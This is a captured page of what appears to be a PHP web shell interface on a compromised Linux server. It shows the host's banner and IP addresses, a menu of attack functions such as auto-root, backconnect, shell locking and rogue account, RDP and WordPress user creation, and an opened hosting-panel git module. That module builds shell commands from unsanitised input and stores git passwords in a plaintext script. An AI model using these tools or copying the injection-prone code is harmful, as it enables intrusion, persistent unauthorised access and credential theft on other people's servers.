Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.140.197.130
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
mod /
base /
git_tool /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
50
B
-rw-r--r--
install.py
1.04
KB
-rw-r--r--
install.sh
565
B
-rw-r--r--
tool.py
19.66
KB
-rw-r--r--
util.py
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tool.py
import json import os import re import shutil import time from .install import installed, install_git, version_1_5_3 from .util import read_file, write_file, ExecShell, set_ownership from typing import Optional, Dict, Union, List from urllib3.util import parse_url, Url from mod.base import json_response GIT_TMP_PATH = "/www/server/git_tmp" class GitTool: def __init__(self, project_path: str, git_url: str, user_config: Optional[dict] = None, git_id: str = ""): self.git_url = git_url self.get_id = git_id self.project_path = project_path if self.project_path[-1] == '/': self.project_path = self.project_path[:-1] if not os.path.isdir(GIT_TMP_PATH): os.makedirs(GIT_TMP_PATH) self._tmp_path: Optional[str] = None self._askpass_path: Optional[str] = None self.user_config = user_config _conf = self.get_user_config_by_project_path() if _conf and not self.user_config: self.user_config = _conf self._init_tmp_path = False @property def tmp_path(self) -> Optional[str]: if self._tmp_path is not None: return self._tmp_path if not os.path.isdir(self.project_path): return None ino = os.stat(self.project_path).st_ino self._tmp_path = "{}/{}".format(GIT_TMP_PATH, str(ino)) self._askpass_path = "{}/help_{}.sh".format(GIT_TMP_PATH, str(ino)) return self._tmp_path def get_user_config_by_project_path(self) -> Optional[dict]: if os.path.isfile(self.project_path + "/.git/config"): git_config = read_file(self.project_path + "/.git/config") if isinstance(git_config, str): return self._read_user_conf_by_config(git_config) return None @property def askpass_path(self) -> Optional[str]: if self._askpass_path is not None: return self._askpass_path if not os.path.isdir(self.project_path): return None ino = os.stat(self.project_path).st_ino self._tmp_path = "{}/{}".format(GIT_TMP_PATH, str(ino)) self._askpass_path = "{}/help_{}.sh".format(GIT_TMP_PATH, str(ino)) return self._askpass_path def _setup_tmp_path(self) -> Optional[str]: if not os.path.isdir(self.project_path): return "目标目录:【{}】不存在,无法进行git操作".format(self.project_path) if not os.path.exists(self.tmp_path): os.makedirs(self.tmp_path) self._init_tmp_path = True else: if not self._init_tmp_path: shutil.rmtree(self.tmp_path) os.makedirs(self.tmp_path) write_file(self.askpass_path, "") ExecShell("chmod +x " + self.askpass_path) if os.path.isdir(self.tmp_path + "/.git"): return None sh_str = """cd {tmp_path} {git_bin} init . {git_bin} remote add origin {git_url} """.format(tmp_path=self.tmp_path, git_bin=self.git_bin(), git_url=self.git_url) ExecShell(sh_str) if not os.path.isfile(self.tmp_path + "/.git/config"): return "git Initialization failed" git_conf = read_file(self.tmp_path + "/.git/config") if not (isinstance(git_conf, str) and git_conf.find("origin") != -1 and git_conf.find(self.git_url) != -1): return "git Failed to set up a remote route" if self.git_url.find("ssh://") != -1: # ssh的情况下不做处理 return if isinstance(self.user_config, dict): sh_str_list = ["cd {}".format(self.tmp_path)] config_sh = self.git_bin() + " config user.{} {}" for k, v in self.user_config.items(): if isinstance(k, str) and isinstance(v, str) and k.strip() and v.strip(): sh_str_list.append(config_sh.format(k, v)) ExecShell("\n".join(sh_str_list)) askpass_str = """#!/bin/sh case "$1" in Username*) exec echo "{}" ;; Password*) exec echo "{}" ;; esac """.format(self.user_config.get('name', "--"), self.user_config.get('password', "--")) write_file(self.askpass_path, askpass_str) def remote_branch(self) -> Union[str, List[str]]: error = self._setup_tmp_path() if error: return error out, err = ExecShell("cd {} && export GIT_ASKPASS='{}' && git ls-remote origin".format( self.tmp_path, self.askpass_path)) rep_branch = re.compile(r"refs/heads/(?P<b>[^\n]*)\n") branch_list = [] for tmp_res in rep_branch.finditer(out): branch_list.append(tmp_res.group("b")) if not branch_list: return err return branch_list @staticmethod def _read_user_conf_by_config(git_config_data: str) -> Optional[dict]: rep_user = re.compile(r"\[user][^\n]*\n(?P<target>(\s*\w+\s*=\s*[^\n]*\n)*(\s*\w+\s*=\s*[^\n]*)?)(\s*\[)?") res = rep_user.search(git_config_data) if not res: return None res_data = dict() k_v_str = res.group("target") for line in k_v_str.split("\n"): if not line.strip(): continue k, v = line.split("=", 1) res_data[k.strip()] = v.strip() return res_data @classmethod def global_user_conf(cls) -> dict: res_dict = { "name": None, "password": None, "email": None, } global_file = "/root/.gitconfig" if not os.path.isfile(global_file): return res_dict data = read_file(global_file) if not isinstance(data, str): return res_dict res_data = cls._read_user_conf_by_config(data) res_dict.update(res_data) return res_dict @classmethod def set_global_user_conf(cls, data) -> None: sh_str = cls.git_bin() + " config --global user.{} {}" for k, v in data.items(): if isinstance(k, str) and isinstance(v, str) and k.strip() and v.strip(): ExecShell(sh_str.format(k, v)) @classmethod def ssh_pub_key(cls): key_files = ('id_ed25519', 'id_rsa', 'id_ecdsa', 'id_rsa_bt') for key_file in key_files: key_file = "/root/.ssh/{}".format(key_file) pub_file = "/root/.ssh/{}.pub".format(key_file) if os.path.isfile(pub_file) and os.path.isfile(key_file): data = read_file(pub_file) if isinstance(data, str): return data return cls._create_ssh_key() @staticmethod def _create_ssh_key() -> str: key_type = "ed25519" ExecShell("ssh-keygen -t {s_type} -P '' -f /root/.ssh/id_{s_type} |echo y".format(s_type=key_type)) authorized_keys = '/root/.ssh/authorized_keys' pub_file = "/root/.ssh/id_{s_type}.pub".format(s_type=key_type) ExecShell('cat %s >> %s && chmod 600 %s' % (pub_file, authorized_keys, authorized_keys)) key_type_file = '/www/server/panel/data/ssh_key_type.pl' write_file(key_type_file, key_type) return read_file(pub_file) @staticmethod def git_bin() -> str: if not installed(): if not install_git(): raise ValueError("There is no git tool and the installation fails, so this feature cannot be used") default = "/usr/bin/git" git_path = shutil.which("git") if git_path is None: return default return git_path def pull(self, branch, set_own: Optional[str] = None) -> Optional[str]: if self.git_url.startswith("https://") or self.git_url.startswith("http://"): res = parse_url(self.git_url) if isinstance(res, Url) and not res.auth: if self.user_config and "name" in self.user_config and "password" in self.user_config: res.auth = "{}:{}".format(self.user_config["name"], self.user_config["password"]) self.git_url = res.url git_name = self.git_name() if git_name is None: git_name = 'None' if os.path.isdir(self.tmp_path + "/" + git_name): shutil.rmtree(self.tmp_path + "/" + git_name) log_file = "/tmp/git_{}_log.log".format(self.get_id) shell_command_str = "cd {0} && {1} clone --progress -b {2} {3} &>> {4}".format( self.tmp_path, self.git_bin(), branch, self.git_url, log_file ) ExecShell(shell_command_str) if not os.path.isdir(self.tmp_path + "/" + git_name): return "Pull error" ExecShell(r"\cp -rf {}/{}/* {}/".format(self.tmp_path, git_name, self.project_path)) if isinstance(set_own, str): set_ownership(self.project_path, set_own) if os.path.isdir(self.tmp_path + "/" + git_name): shutil.rmtree(self.tmp_path + "/" + git_name) def git_name(self) -> Optional[str]: if isinstance(self.git_url, str): name = self.git_url.rsplit("/", 1)[1] if name.endswith(".git"): name = name[:-4] return name return None @classmethod def new_id(cls) -> str: from uuid import uuid4 return uuid4().hex[::2] class RealGitMager: _git_config_file = "/www/server/panel/data/site_git_config.json" def __init__(self): self._config: Optional[Dict[str, List[Dict[str, Union[int, str, dict]]]]] = None # c = { # "site_name": [{ # "id": "", # "site_name": "aaaa", # "url": "http://git.bt.cn/cjxin/panel-plugin.git", # ssh://git@git.bt.cn/cjxin/panel-plugin.git # "path_ino": 4564524, # "git_path": "/www/wwwroot/site", # "config": { # "name": "", # "password": "", # "email": "", # }, # } # ] # } @property def configure(self) -> Dict[str, List[Dict[str, Union[int, str, dict]]]]: if self._config is None: try: res = read_file(self._git_config_file) if res is None: data = {} else: data = json.loads(res) except (json.JSONDecoder, TypeError, ValueError): data = {} self._config = data return self._config def save_configure(self): if self._config: write_file(self._git_config_file, json.dumps(self._config)) def add_git(self, git_url: str, site_name: str, git_path: str, user_config: Optional[dict]) -> Union[str, list]: url = parse_url(git_url) if not (isinstance(url, Url) and url.scheme and url.host and url.path): return "The URL format is incorrect" if user_config and not (isinstance(user_config, dict) and "name" in user_config and "password" in user_config): return "User information is entered incorrectly" if not os.path.exists(git_path): return "The git target directory does not exist" else: path_ino = os.stat(git_path).st_ino if site_name not in self.configure: self.configure[site_name] = [] for c in self.configure[site_name]: if c["path_ino"] == path_ino or git_path == c["git_path"]: return "The path already exists, so please do not add it repeatedly" try: GitTool.git_bin() except ValueError as e: return str(e) git_id = GitTool.new_id() git = GitTool(project_path=git_path, git_url=git_url, user_config=user_config, git_id=git_id) res = git.remote_branch() if isinstance(res, str): return res self.configure[site_name].append( { "id": git_id, "site_name": site_name, "url": git_url, "path_ino": path_ino, "git_path": git_path, "remote_branch": res, "remote_branch_time": int(time.time()), "config": user_config, } ) self.save_configure() return res def modify_git( self, git_id: str, site_name: str, git_url: Optional[str], git_path: Optional[str], user_config: Optional[dict] ) -> Optional[str]: target = None for i in self.configure.get(site_name, []): if i["id"] == git_id: target = i break if target is None: return 'The specified git configuration does not exist' if git_url: url = parse_url(git_url) if not (isinstance(url, Url) and url.scheme and url.host and url.path): return "The URL format is incorrect" target["url"] = git_url if git_path: if not os.path.exists(git_path): return "The git target directory does not exist" else: path_ino = os.stat(git_path).st_ino target["path_ino"] = path_ino target["git_path"] = git_path if user_config: if not (isinstance(user_config, dict) and "name" in user_config and "password" in user_config): return "User information is entered incorrectly" target["config"] = user_config git = GitTool(project_path=target['git_path'], git_url=target['url'], user_config=target['config'], git_id=target['id']) res = git.remote_branch() if isinstance(res, str): return res self.save_configure() return None def remove_git(self, git_id: str, site_name: str) -> Optional[str]: target = None for i in self.configure.get(site_name, []): if i["id"] == git_id: target = i break if target is None: return 'The specified git configuration does not exist' self.configure[site_name].remove(target) self.save_configure() def site_git_configure(self, site_name, refresh: bool = False) -> List[dict]: if site_name not in self.configure: return [] res_list = [] for i in self.configure[site_name]: if time.time() - i.get("remote_branch_time", 0) > 60 * 60 or refresh: g = GitTool(project_path=i['git_path'], git_url=i['url'], user_config=i['config'], git_id=i['id']) res = g.remote_branch() if isinstance(res, str): i.update(remote_branch_error=res, remote_branch=[], remote_branch_time=int(time.time())) else: i.update(remote_branch=res, remote_branch_time=int(time.time())) res_list.append(i) return res_list @staticmethod def set_global_user(name: Optional[str], password: Optional[str], email: Optional[str] = None) -> None: data = {} if name: data['name'] = name if password: data['password'] = password if email: data['email'] = email GitTool.set_global_user_conf(data) def git_pull(self, git_id: str, site_name: str, branch: str) -> Optional[str]: target = None for i in self.configure.get(site_name, []): if i["id"] == git_id: target = i break if target is None: return 'The specified git configuration does not exist' g = GitTool( project_path=target['git_path'], git_url=target['url'], user_config=target['config'], git_id=target["id"]) return g.pull(branch) class GitMager: # 添加git信息 @staticmethod def add_git(get): user_config = None try: git_url = get.url.strip() site_name = get.site_name.strip() git_path = get.git_path.strip() if hasattr(get, "config") and get.config.strip(): user_config = json.loads(get.config.strip()) except (json.JSONDecoder, AttributeError, TypeError): return json_response(status=False, msg="The parameter is incorrect") res = RealGitMager().add_git(git_url, site_name, git_path, user_config) if isinstance(res, str): return json_response(status=False, msg=res) return json_response(status=True, data=res) # 修改git信息 @staticmethod def modify_git(get): git_url = None git_path = None user_config = None try: git_id = get.git_id.strip() site_name = get.site_name.strip() if "url" in get: git_url = get.url.strip() if 'git_path' in get: git_path = get.git_path.strip() if hasattr(get, "user_config") and get.user_config.strip(): user_config = json.loads(get.user_config.strip()) except (json.JSONDecoder, AttributeError, TypeError): return json_response(status=False, msg="parameter error") res = RealGitMager().modify_git(git_id, site_name, git_url, git_path, user_config) if isinstance(res, str): return json_response(status=False, msg=res) return json_response(status=True, data=res) # 移除git信息 @staticmethod def remove_git(get): try: git_id = get.git_id.strip() site_name = get.site_name.strip() except (json.JSONDecoder, AttributeError, TypeError): return json_response(status=False, msg="parameter error") res = RealGitMager().remove_git(git_id, site_name) if isinstance(res, str): return json_response(status=False, msg=res) return json_response(status=True, data=res) @staticmethod def site_git_configure(get): if not version_1_5_3(): return json_response(status=False, msg="Git versions earlier than 1.5.3 are not available") refresh = '' try: site_name = get.site_name.strip() if "refresh" in get: refresh = get.refresh.strip() except (AttributeError, TypeError): return json_response(status=False, msg="parameter error") if refresh in ("true", "1"): refresh = True else: refresh = False res = RealGitMager().site_git_configure(site_name, refresh=refresh) if isinstance(res, str): return json_response(status=False, msg=res) return json_response(status=True, data=res) @staticmethod def set_global_user(get): name = password = email = None try: if "name" in get: name = get.name.strip() if "password" in get: password = get.password.strip() if "email" in get: email = get.email.strip() except (AttributeError, TypeError): return json_response(status=False, msg="parameter error") RealGitMager().set_global_user(name, password, email) return json_response(status=True, msg="The setup was successful") @staticmethod def git_pull(get): try: site_name = get.site_name.strip() git_id = get.git_id.strip() branch = get.branch.strip() except (AttributeError, TypeError): return json_response(status=False, msg="parameter error") res = RealGitMager().git_pull(git_id, site_name, branch) if isinstance(res, str): return json_response(status=False, msg=res) return json_response(status=True, data=res) @staticmethod def git_global_user_conf(get=None): return GitTool.global_user_conf() @staticmethod def git_ssh_pub_key(get=None): return GitTool.ssh_pub_key()
Close